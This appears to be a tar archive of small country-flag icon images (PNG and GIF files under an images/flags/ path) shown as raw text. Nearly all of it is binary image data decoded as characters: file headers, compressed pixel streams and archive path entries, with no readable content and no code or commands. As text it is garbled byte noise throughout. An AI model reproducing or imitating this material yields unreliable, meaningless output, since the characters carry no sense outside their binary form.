IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b|��� ������p(�6� �й�'��$P�dK|��K
m����@b�������'O�������@��@�߿��?���$+� �X�v����ÿi-j?X��??��PdQ�a�Y�y��?1�e��������@��r1��������H3I�s�
2
���E��:�_���@ '���_�S����]�]���=��`�?��r$�t������?���cd�����<�K.�����d���+�
��o�u@��2��w��Ϳ��p����߿_����T� � N���Wq�yP���߯� j���`�Y���8P1@����QR����j�H$���@��x��b�110i�K0�{��IEND�B`�images/flags/ws.png000060400000000734152434416630010254 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<nIDATx�bd`�f@��`䏟w��9� �X����K�DLL��nd${���W�^�����߿����F~ٴ	 �X�����9�Я_��������������������QVh@1��a���?���кz�P���?@�`u?A�/���i����޽7!�~��u�������
4���/d
@��I�X��`���Ԯ�wo�`�����
@'A!T��� �X�2�g�{����o�b�
��ѿ�a$#�I�Č`!�(�PU�d����@ 
�� c�+����/�߿@?H��?��`c�2��d�!���_* Ư�ɀ��R@`o�]�.oIEND�B`�images/flags/nl.gif000060400000000106152434416630010206 0ustar00GIF89a�!F�����(!�,�������ڋ�����H��);images/flags/sa.png000060400000001047152434416630010224 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�f@�����H��@������#�(���,�lg��2EY�i�)�� ��i�~��P����_~������������ˏ�2B�@��t�����a�h�,���ǧ����1�132�{�N��K��Z�@ 
`��?}����)# ���y��~~����7�̿�]�@L@����on��_�|���ڋkl�מ_�`���k;����$��
@��a,�WB�ڇ�ro�YZ�B��������c���� �
����3�:����%xX����Wd����j � ��g����-����÷�@� �X�q��	>	p�E���F��+�.�ONH�h'P@12(�D$�O� �0z7�9N�IEND�B`�images/flags/mq.png000060400000001217152434416630010235 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<!IDATx�1�%����xB& ���ɼ�������v�YoJ2.uc������ӡ�э���L��IYB^��I��T����'����� g��zp�)��ԅ#G������?��W_�<~��"��������>���������O�"\���g`�@,�����/�UUZ����������
߾����oE�7��o���~ �٫ϛ�J?}�����^nV�#���'}���W6�?�I���_w
 �����������/������Ͽ����,?| �yk.��K	𲳱2>y���_@�F�����$����x�{6V�E��1�uz�L��gV.�������P���Bb����ta4������{����?�_>�y�Sn.VN�������߿�������AF�P ��?����m$/����_
%!���������ɦ��_�bb+@%�>�43�10�b`��ݗ/W}")�G.��!��$@����:�hIEND�B`�images/flags/tm.png000060400000001121152434416630010232 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�d���$?�|���!ѐ�������~10�`��?  1�|s�"��
u�	���Rs�������������������s��	��?çO�~>|u�'ϥ�7��x۷�1s�����n=x�ٽ����?���������;�3��&ۇ��{��+�������ן߿~���h�o��bj����Ͽ�~�����_�]��L�������S��y��o��� � �X�~���/+��o_��r������'�R�T�K(�{��Ƿ@� K���8	 �X�a���_�8~�}����/��هW~���؆?@o5� ���/ǯ�\���q�/`�j����50����ghn�������`��~��q0p��i �
>߽�"����s)I�? ���
V���l ����bd�E�ğ2w���A&���IEND�B`�images/flags/da.gif000060400000000105152434416630010160 0ustar00GIF89a�����3!�,�
p˛
ϋpRfcڼ�*�x�%F�Av�M;images/flags/no.png000060400000001000152434416630010222 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b|�r��sE]��D�3�?�`A�	@,@Q��j �����)FFF���0����~��
"��߿�n�@,`���{�H�|���σ@�������׿_�����,+� ���U��@�����_ � �@=�@$���@W��߿@g@�������c@e�>#s�d����v�@m@��$����H	���9
@�������ɂg�q��q&&�����=ff�ܬ?��l��줷v�~�|���o�7~�aQV�z�@���d@� g����'D�/� H'���?��f ��?�$A.���,�_P�3���������@�WaQ��މ�̮	���1$�`$�Z��l��IEND�B`�images/flags/cn.png000060400000000730152434416630010217 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<jIDATx�b�����@@����n"�,��
@,@�D}5o,���X����x���?���������$�}m�&�i��,��7��۪����f3�˪����� u����~�,��@K�/k�����붿�f��ϯ�/AJ��~I(��� �X@��u���8M�����~��@����U�k �����q�8�V�7�T��@@
��/�������:������
�D����UM�@ 
@ĉ��΀���l0X����� �X@����$P�	(��7�xX�����_��b�b<��Ȍ?H����a
`:�s0�56�IEND�B`�images/flags/so.png000060400000001017152434416630010237 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bT�������ߟ?��1��� �/���B97��h��h���&�ȰO@��Q]�z�7$a����*��8���
 ��W_��AJ��2���������`�8#P@1�*��6����vr����������? �t@��a����������f��8���gd������;����_���������N�R<�%�����*����� �? 
`W�����+
��g�������?���������$�����Ͽ�A�f�d��2��@,@[��e�Ӱ��_@v�y
��/�� �3�a ����-���W�� �
`��t@12�~e��Hb@���G<�mx�ȮIEND�B`�images/flags/tc.png000060400000001160152434416630010223 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�bܟ_��C�sǧ�O�X��p��`$���0������y�f)�7n0|��OJ�O�˃����ߟ?�~��"�����ߦ�N�1���	�ɾ�����?���4����������e��S��6��'_n�eeWVx��5N��/~��Sg�IX��k�K���j �v~L\\�>��a{�g1����k���2��K������@�51���Ȩ!���
��Ƽ��/��������������e�"l~8���_7|���ﯿ����������w��~����b�������(����?����a�>儕�/_�>n����?�bj��(
5�h6�
"����3c�Ͽ����r@5���翤О? 
o�R��_^�q��c����?���#C(j\��+RL�� �2%>���%�IEND�B`�images/flags/gr.png000060400000000747152434416630010237 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<yIDATx�b�?��pb��4�x�������(���"��P���������]L�3����S���@	� ��?ÃG���ѣG��� q02����T������tx��b�(���n���ߟ���������/$�R?�
@1�[v3�أ	T�uhҶ	ZPW0@������֭G���̍7���s��%��CH�?'˅Cw��ŋ7""H"3��1н@��{@,�}��e�����I�!f�Tapq0� �X�y�$��˯�@_�y��=�$"��ڹ�&@1޼�QT��H���(… �0�:{ ��7C#��?�?��;�0�kP�l�~IEND�B`�images/flags/na.png000060400000001207152434416630010215 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�bd`������_����-2q����/)W�`	�1��~}C���������������26OK	��������h*���U��;�<z(���oNN��M3u����������?��u�*������#�of��@�ZEM8?W���S�������������;�������֦\l_�?

W���[:�M���4;,�E�7����� ��������K^��n���9���{
t�n��]ŷ�y*���~yCQ@���߿6N�q!�<��2.^���/�3�\_gDn�v�_�__~]��70�����H_��;g{��W@3s~�-~b��r��ԃÿ~����r@��������R�c��(�$��Io~��4��? 
�� �X���B��I�`���Bo��������f��ϟ��n��7�N Ư��[+'oS�V?� �/���}�@������IEND�B`�images/flags/sl.gif000060400000000262152434416630010216 0ustar00GIF89a�+?�#�鉗���L8����F6�qR���㬠�	�MTԫ��%3�,?�qi�������!�,/�$�di�����,�$���8w�A�+��rY�8�ШtJ�Z��;images/flags/ye.png000060400000000635152434416630010240 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e</IDATx�b|π�`$2���I�bJp�V���1������?���D��7�d���o�ŒM�6��O���D~3��V���o0��׿߿�l&iY�
�"���ޞ�����m�$A:���A��@AF�o,���WNNN���3�!.�����#�b���D5Hn�@YFF�b�i�	�5h���e„>�ϟ?���ȇ�pT
������ F�3����߿�~���D������N�8@�`�HHH��H�C 
���-@��V3a�zD�IEND�B`�images/flags/td.png000060400000001072152434416630010226 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bu���/�����`�='KL�՟?������3���� $��͇_}EZ ��߿E�k�پ��������x~q�<����?���y6>@���`$l��k[-�,��3��q�ZqA�����jCS��	@�� $9�0B���QN�:T?
��ʑ͐�-�xP8)�0�a���ZMW�C@���#o�&����+H��NI�?,R.�Ku�?i2��ɥ�C;�#�iJ������yp�����< �@�0��t	�6�
@
@ �f�z��~C��� �X~5����rPϿ� N(H0X��j �/�QA6���?�Y��ف~gb����#�/9��P
�� ����7�A��tpu��(��nfb���G&H��:"z�[�VIEND�B`�images/flags/gu.png000060400000000775152434416630010243 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b��ɀ���b��„��P��dM�R����@
���?@ܿ�����7P
̨�� ��/߂��U����_໥�L��D������@=�K3�a` &�����
��`����{�p�ć� �@�Dm:	 �������������7������9�ǿ~��#�P@�0��h��@m����I������߮?����u�_F��b�v�����{&k���7;�/�Y���* & ����\��_J	�y��̯ߌ������j�i�w�������ۘW1��*�z,�T@ '��{���Ӂ��0�
kF�j�z�b�b������?��0�H��sdIEND�B`�images/flags/nf.png000060400000001132152434416630010217 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b`pf���{g�~�����?~|�����|ڽ��A����������s����l�lx��������w)^)οN�N���������M�������������n��{kH��?��|��߿�
��``���AV��������B��k�����
����V}�����������
t#ñ�Ǟ�{��ݳ	;&0�g����@ ������?����?��t!��m~�j &�_@3�UE��-;���?`/���~��YP�Am � (tȰ߿�{��˧�߿�yu���o@�=4��_�
���b�R������������Y.Y���7_�
2*@
����I~I�6VvMNMq���@���ʢ*�� �$�z@�C��8�6�w_���C�G�ˏ/�MZ���>�T GH��IEND�B`�images/flags/sk.gif000060400000000457152434416630010223 0ustar00GIF89a�xx�zz��,�9I)0�-/��yy�""�鉓�&;�&&=��'@FF�VV�n|됙qq�eC��wy�2F�y��z��-TH���!?�;���KG��-A�yz���MM�划�[[nn�c?|�:K�*?�!;	3�����!�,L��pH,�ȤRx��*�j@BL`��N�D'�xϥ���H�^Ǥ�"�D�)��e{���$������,A;images/flags/cg.png000060400000001011152434416630010201 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd8�����@��R���������� �X�Պ�`���������?������'F������&����}@��M���S�ҿ�����HU�K�6��P�/Z��q�,�z�b��d0L����RD[sA����~����o��b*���� ����4��n����������_��f��h:@�4��2��ߟ4�����v�������@y���R��߯$�?�|����k~�����/�F���h����bD���ÔI��_��@U3��j�럿B�~�
 ��X�g�Q`
��C��ba����Ǐ_���(���o�i��0���!�$�b�ʰ�'4"���ݘ��fv&R��IEND�B`�images/flags/sh.png000060400000001205152434416630010227 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b|�k9-�k۱7��=��P�=�C��eA����o~10��@�1�KW��R��)>*Dz����5I%�Ѯ�&����������������������1������������

����gK�������������
���1��/����������W�����
��j�1��\���?c���3Z�� =��������������1�P�|�8���������� H)����������#�������%�wX��O�~���-�o.]{��6#Ы�}���t{��o�8�i���� ����?0(��g������߿������ߟ_�����{�3�K��q�:���/(��h0Ԁ���P9�����x��J:��?^)��# ��~���OB�(
>0��J�R�������������,"������&yG9I٫h_xIEND�B`�images/flags/dk.png000060400000000757152434416630010226 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b���
�����z�AR���������Q]
V���xy�K��}���ϟ��3�I ����/7m �����<e���?�߿�?���3Hݯ�����P5��,�t�,�A@@���I�f��0�8_w��Ģ=-�A#X8s���H��y!h�6�;TM7(|�*$r��b�t�0����F����������cC����#Ȩ�򊙙7+�� W��ŵk��������	����,JJOΝ �
���HB,�����O� P�`�z��y���?L��`c�����_�0B�����`�A�����"��o�<z���.I�hfb`0�Y��Vg�IEND�B`�images/flags/mx.png000060400000001076152434416630010247 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd��f`ba��?^��cb`����$����JQ$�@�25Fw200�������B��L�L�����߬9�����Ⱦ5o@�����ӫ���~�����?�������7��$��b���hȿ?��f߻r�Y
kf��߿������7�a������@�����h��o�xs��ꉭw��:�_�~������6ï_ ���j`����%�- ��h��?`�2�6��d6�j�w��S!A�]��:	l�? �/@50�������L��}y���������N�T�@@'1���/�����ү_�AA����5H���y���������B�LL�r�����@O#�-8�����m٘؀���|yfk�V�@���T�Li)IEND�B`�images/flags/cx.png000060400000001140152434416630010225 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�g�Y������Df�@120��nUa�;�O��?���������? ���(�g�ߛvl 6�o\O�8�5:��~�o��@=������~��Do��:e�6��������k�V��|4���߿�����W�������۔��I@1�U��*qs1�y!�kZr�c�įX�_ݪ�~���v�Wҕ_������w��i��c)*�����I�U~���v����O
�vR�̯��}��$�j`HI�z���_~��_�~>ʓ#�k��O�?�~��	T��߯�@�j1�S����__))	��ﯩ=����"{ll��!�����������?����?��B�0�X@���
d,��?	3�XT�R���"@C����u�x23$KK����0���	���[+�>���$�ڰ���Rd"G�/0	�����P=Be��IEND�B`�images/flags/mg.png000060400000000705152434416630010224 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<WIDATx�b|��=���O@X�Ɓ�('  $���R��������a��������_6m �yP�@�ӧϟ�T@�/ ��_@6��,��bAQ
dMJ�H�R���
�5���@����p
@e�����쿿�����_��$P��?���c` �j��y!��}�����@`��/�>%�ߧ~2���@��_?��QT����ߟ��^1�In���P�_ b��@P�z�9�����H��?���/�����@1>~�����H���3<G)�<�&��I�$�cݛ�xIEND�B`�images/flags/ir.png000060400000001000152434416630010220 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd���
�10������da �/ծ� �@���￿�����ϟ��?����o��	 �X���|}��_��?��������߿�����H���c`b1��Z���
������
��	������**�V����߿���@'������������������>}�@L�B� �e�߼����т���O�bBW
11��>����D���5s-;;���3g~����?A����<HP��	����\��k@1�d``��w�ï_��!8�����s��KL?~2���D��e���oF����A��/�b�b�
�Y8b@�I@���H$78�IEND�B`�images/flags/pn.png000060400000001221152434416630010230 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<#IDATx�bLN<=��\�
7�����Q��p���N�5���700|c`���L�1�Qo�}h1���%
����
���������������������1��0�C0���������������������/���
���1�������������	���#E���<-�&;��1��>�+(���H�ܿ>������������8���1�
�����(�������)̌�@�����5�����1����6F������2����3��
��������	p��������o濿�������?��~g������{W���;�$������_���Ͽ�T�ܐKt������@���(!.����?�����_��?����w�S���1�>4�@120�#G$�A���$@���/Z:�YIEND�B`�images/flags/gm.png000060400000000755152434416630010231 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b<�����`�0D ��v�@?\�9�U�p�<j��ѩ�_O&-��&Hp��bk����S�ҿ�r���ʁ�_@Ư��~�l��@��E�saQQ����H/�� L�4##��+W�Q<�oS(㫏!����_(���
�0N��@,/o1����D���HP�o�����?�b�b���b*؆?P#� �7��??���x��}iq����A�� ���t��bd�gHH����￿����_@a�I��/`����WE@�b�E�b��9�ܒ@i�蟿���"���� ����@12�30�`�@1�	�����!`�31�lE�!�IEND�B`�images/flags/ja.gif000060400000000141152434416630010166 0ustar00GIF89a��3Q�f}���@�&���!�,&X��Љ0FQ	@:Xx^�
d7�)���m$�Su�|�$;images/flags/zm.png000060400000000764152434416630010254 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bdndf�����2�c`�F@�/0�
 �X��&yN�������������>�|��߯_�p���ٷ �X f���
��߿?�������� ���,�q����ϯ	j���h����F
���D������߬�����'WR("�r@���2�2�����P���k\8��������Gd�)��
��h6���B�~�@��d�A�V��/���o�����E�K~������/ �
@u@�R���Bmi����� �X�J�p��,��:0<X�>3	����WE�Ȑ���x�=� ��	���|ͯwKݵ�IEND�B`�images/flags/mn.png000060400000000754152434416630010237 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<~IDATx�b�π��^20��x@��+��?��$U]�`���?��j��|����?��af���'���@>���i@�50��/����_�w���$E�������_��FYY�
�R�A�/C�_���?`��A��Q�`�bb�T�������ϟP�!�����D��!��������a\L�������?�U��g����Z�R�j$�N ������P��O�� 6�?�00H��?���f`j�����?@
��: �@�f�a�"��觿R�L\ �#�I�?L��@J�� ��"�"	3\f`�@��A‚��N��[YIEND�B`�images/flags/tr.png000060400000000754152434416630010252 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<~IDATx�b�π�P�X@����� $����-��(ҼN�33�Ȗ\�F8��U�@���'���?yT
R������;��R��߿���d3��m ���`�A���LMAꔕ�wt���k`��� ��@��ڨ�������II�7l���������ZT@L '��	uq����1����W��/$�͚�ffP
�M ��������10�kk�������%��=��oD�I�Č`K/������ ������E����2�@�40��h��������YYA����N��5�B��i`���ARl�_��'�:������8�� ���F$�8����;\F�oIEND�B`�images/flags/np.png000060400000000673152434416630010242 0ustar00�PNG


IHDR	�Y�gAMA��7��tEXtSoftwareAdobe ImageReadyq�e<MIDATx�b4�<��-;/�p^�� c�c�?<gd�'�{���1@1�����P���nj7�qq�j�n@1����A����?20sp0�ۣ�)�:��"�b��÷}�������KI1l���,)��� ���oX���	p�����#�o^���_�2��/~�tt0�u�A}�g�wO��� 9���jk��|���������'��wt�K��@�3��ƬBBK_-f��	 �Ą��ӓ������j ���@�܂�@�7P���`��Aq� ����	i�IEND�B`�images/flags/pg.png000060400000001121152434416630010220 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�L�A
����?�I�6I��L#�9�.&��Ө��1 ��"X@0�eݚ6p��7g��*|�b")���Ky�*�͞bjx����S��C����������_��_����7���?�bj��h�߽��m��W���i����������~�w���?H� �@�����ϟĘ%G��_�������~�����_�����4��b�i`aa��̜1}�������V���u���~������_�~���
�
8��@����J}�K���������󤈰�B���5�E)헮i�������WSS���Ј���������M��f�f�	
�?
% ���999w�ܙ1cP5�!�����Wٟߑ�2�F@�4���GRR�ׯ_����
S����������/+@1��@��g4�IEND�B`�images/flags/yt.png000060400000001121152434416630010246 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�$�A
0�T��o{�ֹBRR|�:�f�
�t�Y\(�c@
���w&�/\$vY ��\�/镽m-��̝���ɜH@D\�1�aapq��02�����?3����?P'###��b������/x��Ϝy��������:��&��jý��?�{4ZE]c�ܻ/_�``����3�[�/������OOO�ϟ?��淯_UUU�8����L�6:�0s?PVS[��˗��H��z��U##f&�ʟS~g���󻓙����_f��O22�@4�:���������_�X@��ק_?~���������I@���YXX~32r$������X�9���98���
�* Ʒo����-y������������ׯ_M��ݻw��������p
Z
t�`&�C� �WM$��B�IEND�B`�images/flags/gd.png000060400000001175152434416630010215 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b�π�:^10�20�3�����_,�?!��1@@1�e`X��:^�����߿��b�u���� ��������	 �X�
_q�oz�4��&��̿�����7H)�������_��f��@,L�����o�˿�<�}��
������7?~-y�{ś__~1��@, ���[#����-o���;@��2&�ߌ#~-x���߿������?��b���4����@3���-���o��?1���2<���_@
������t���?3��	������/��L�o��{��/��ߌ����
�@ '���{ï?�x~�	��f�����Q�~�p������׿���?��3�����ی8����_��~˰�n��,�����_o�M �
"��4�H2��f����/�l�@60�~���=�_[��w��b` Ư�X�����A���>��O��ÿ� Y0B�/!�iIEND�B`�images/flags/cv.png000060400000001021152434416630010221 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bdH����1�����c��J�� �rNCA�2Q�l��$��o&;�0m+��d4Ѐz>�*}���b�O@`@r 
�`�~�W��h@�4��R
��\�<���n�Y�_��5*����N�@L@�`��d�F�nz�A$zM�bɆ��[����@���edd��cF���#����33Wu5��{�P�i�������_�����?g<���-��3�ɽڵ ���
��<�e��޼y@,��JӘ��o'2�puծ��/T��u�u��X�P��Sf�_�@�
�f�L\l/�H��..���mƋ/�g��xj���������	
�;�#��W��2Q���1A `�B%
��[IEND�B`�images/flags/sy.png000060400000000646152434416630010260 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<8IDATx�b�π�P�X@�����_����upɒ�2�ҒKF6h�U
�wg���@� տCH(�$����f���@,�>~���e��!�F�w��@��~���������{ѧ?_�z���@L@7u������[u{�����ݏvM�:fß?���
��>����T
��y�Z4��v0@1�}������!����w�� F +--�޽{���@ ���?UTT.^�@�`������$P
(
���?`�0�@�D20ϞJ*�ҶIEND�B`�images/flags/dz.png000060400000001106152434416630010232 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bT��������ǯ_|af�[����(����`��� 	@,o�}�����������$��,*)��T��?<z� �XX�X�3���H��?���������_�n������
4����HX����?@$��[�ל�~~����ݗAT���nP-@1���d0P��߿��q}����M1fO�/[�221A��t-@1}	2�ϯ����K��K~��`��Z���ɗ�aLLL��̌����_?�.����� =/��V{����*6eu��k ���j &�߀�������Y:���t@��_����N���� �����׏_?/p2dhL���r��/+�����@=����ӯ?�Ex~��
��u�����Y[��6l<D5� FoA�W�~00|c���xgcط�'/D�%�00�Mɜ�7�IEND�B`�images/flags/no.gif000060400000000124152434416630010211 0ustar00GIF89a������+-!�,%�p�֛H1�⥠w녞B�扦K�a�a�%�t
�T;images/flags/sb.png000060400000001160152434416630010221 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�bdf>��"UYy��Z����߿��1��0Br10<��h��1���VVnn..�����������������J;�>2�	c���1�Þ�'44�������������������w_�,+������t���������������g���ϯ_@��b�;⺗�����'ɉ�
@,��"�I���SX��Êo~�fc���4f������n{��ϯ�`[�1���쾾����ﱱ�	H8�UF��ߺ���������������_�v}zq�����|l��*����g��oW�|����￿mz�/��j2~�bK�ߩ�p�����/y[�
�
1�h�߿ �i���v�U叿f���
۾ρ.��b���~�j*��� �X"M$�����(9���?�YeE��J���r�?Pd����b<>��Ôs{10|g  �+�9�IEND�B`�images/flags/mr.png000060400000001071152434416630010234 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�������0�c@�?8P(�6�0CSd5�b�`2Zt��\=9cEo�ϧ^>{CABHJ*d�1�ba`*����S�ҿ@��@�T���{���@�?�~1�����2�0�)@�������ח_�J�#�~�����ߟ<�@�H�a�t�_�������_�~�f����_�X~���+J�H'P�H@1����_ h��׿�8����ׯ��~?���寵�Ͻ����ן�������������?���5���?�~ei�~��זӿ	��� �@@>�_�{�����wץ_��U��
4h.P@�49@:����k�)�@�_�@q�c��"���k�0��
����o��� ��@
_������8v�b���i!��zh]�3IEND�B`�images/flags/tn.png000060400000000757152434416630010251 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�π�P�X@�����_����upɒ�2�ҒKF6h�U
�wg���@� �rr����������_���ee�6��P�qq�?��1���ee�������oh����߿��	�n�j�����?t迆���������%@��rџ� W���^^����8����?//H����������~��_F���
�GG�l����$�9	"��������CCA~53��$|@n���@�50C��ڀ.���_X�_LJ۶�߳�}��5�B��i`���ARl�_�y�:�F2@H%%HP1@1~E�H<q�*8��Zu�IEND�B`�images/flags/nl.png000060400000000705152434416630010232 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<WIDATx�b�π�P�X@���`��U�5��/w9��~����LO)�V�*��<����'ρJ��������@�~��$����(+
� �XD
���3��T���������j Ə?����?����< ���AT�40�V�ed���@���+�o>����Ƞ�_^k���������ן�����
$�����߿
�<{;góO�z��H��߯�@u�5@H��?���p�20� �_ u�œ����#��@���������?`��@��hc`�F��D���B2k�g����IEND�B`�images/flags/cm.png000060400000001015152434416630010213 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd���
X3Ȁ����+ÿ0��B97��_`fSVEWֆ��l�]LtkF�X�r]h@���#S���T��O�>����_ƿ�f������P����_���oFFY�%8c`9����T��'�Eu��&.$l4����eD���|��J���d*P[��������� ���0������߿��� �~���_���_ �_PT�� �@�����_�~�:����?������?����@,@
 ������I@gd�}��=�P���@�4����$���_���!����k�������:&��<��z��I�?�`���@������ɅJ��D���d��P�IEND�B`�images/flags/id.gif000060400000000124152434416630010171 0ustar00GIF89a��&���������!�Niko Wicaksono!�
,������<�ڋ�޼��V;images/flags/de.gif000060400000000106152434416630010165 0ustar00GIF89a����!�,�������ڋ�����H��);images/flags/se.png000060400000001036152434416630010226 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bdpnd���u���������?�_�~�a����� �X��s=�����1�����on�ߟ�����D�����@�M���l�'�������3��{����@E���������07�/�b���P�������ba����/��_`�P3й����AF�2�_@��0����o�&��#0�oFv�O{��� 0
�A�!T�����I�A�E�BH�H�#����A�8�,���������ڒ�������`����篲���I�����������fد_@ՠ ����0���D�O�)@����a`�fԿ߲B<�����_�9����H F�dxD���@����2�B��s�$@�ܹy�'�IEND�B`�images/flags/mu.png000060400000000760152434416630010243 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b<�����`�0D �X��������������?����D��`�>�i@��b`pb��P�?��� ����_@���@lY�y�R��\����?��i�V���o �4ᯜ0��'8��@�iP��ڦ��a��F\��(�`���T�	�#�X$H	�2�y4����
��6���*���)1������_�����?������V��I�S�FF�0�P���mb ��}�����(h���B�A� �o�����}�2C0�%�A�� �	3�j���c@12�3E�1���gb0��e�WIEND�B`�images/flags/dk.gif000060400000000105152434416630010172 0ustar00GIF89a�����3!�,�
p˛
ϋpRfcڼ�*�x�%F�Av�M;images/flags/tg.png000060400000001062152434416630010230 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�π�`�v�`��da �|u5������'���>�����? �����~�����0s@�5pp���`05eX������	~d��������_@���o&v�V/�b�����=�������q��d�_��?��/.�[�� �X������\\W�����?[��_�����ן�@a��ݷ� ��N��|��E�����������_����
"���[���{�2���o������R��p�L�
6��{)��G���QF���?�3���З~������A�ٕ��?@,7�0H�����70����&����k������@,�Ry�!-	�?�����L�<�pl���|/�a F�b�O�������1�&yqnC1���IEND�B`�images/flags/ne.png000060400000001031152434416630010214 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b������c`��@�?`���/02�1��a@��0ۀW�x��9֖a�2,��-�E#D�udG6\!U��<������2���2��
R��������߿Ed�J���͓���@u@K�6����� �32�>= �Xdt89����@������y��Z.�a����@���j.���S[���������3��b�i����!�������/��	0��� �X����̬���@��
��ɩ�������`�U�cga?��@12�3����x���@�	D������߿������UT.6] `��f�#�'	T����?  �����ϟ�@������P���P���ƀ(�c0�eA�	�IEND�B`�images/flags/cd.png000060400000001020152434416630010176 0ustar00�PNG


IHDR���ntEXtSoftwareAdobe ImageReadyq�e<�IDATx�t�?L�AƟ��R�L
!LU�8 	�C�L����?,jX]����+L,�4ơ$~URЄ�
	��ā����W����^ہ�����{�{��=V�;�ߵP(>�
 ���P
҃/���]�<�fƹ�}�w��\s~Z04i�|]-�I��{��Hu�1���!r�n]�|���A�=9�s��>�͐n���9���ʲ<[r�-�%M�뇻��by��,�Aˈ�0�f3�tg?�M��^q�,�����z���Z�,��|i�k��`� �+�yV�3�>�BA� ��7`��+��r���ԁ�K�hu��)�� $�%�{}р���᫩l���@Ҧ� �7�j `�:���'��F3�[P��e�P�P\0L"�j
��#�5���F�x��L��:_z��L1^Q���+��f��~x&�x��5^�IEND�B`�images/flags/sk.png000060400000001062152434416630010233 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b���;�?8�����A8����@,@Y&.. ����&���f� 2���
@�@��>1ç/������/P��0�?`dd���@1�Bd�m^G����{}����ה�����������������wl�1����EBE���jk�]]�vz�������������������������C����Ɣ�?�_�����_L������?����b�
@��t���-[�=����Gi������������?���
lĸ��A�����뻽K�F�r�?\{�~<x��5�����d��]
@,V���;{��ݽ	���;ϰm^/����_��I��o��y>20�aL@7JJ��s�"��YY��@ $��A@��pĀ�E��\*=�M��IEND�B`�images/flags/sl.png000060400000000664152434416630010243 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<FIDATx�bd8̀�10�3���`0@��1�n⨷��8T۫Bde��X%�N���t@�����	 ��O?�Q���￿���
TR��׿_�4�4��b��UaWd	��߿@�P��i�EYD�J� Ư_sr2-��qFF�G��˿� 
��e�����@y�b�b�սX\,�����a����_,��_\����@�\�|��1�{����߯_ a�@� z���p20\ `��JKJ�B��C;���"0
���a%"��?$1�Rq��}�IEND�B`�images/flags/in.png000060400000000767152434416630010237 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b����A0�������!0 �rpC1��*�������%����>^092v�8Y��%
H���@`
@�S�R��,����0��fd��@,��L9�X�������;���ܑ��﯑�mU�� ������#��?�����_&F������ضl������k���9�O	h�( 	T���'�bb;����~��,͵k���_�����?�b��
B�`}���)�������Zd� ��::�~|��ߟ?���������@����#�/��q9@�0�a���!������_`00�b  �E�E �@I0��?�����`
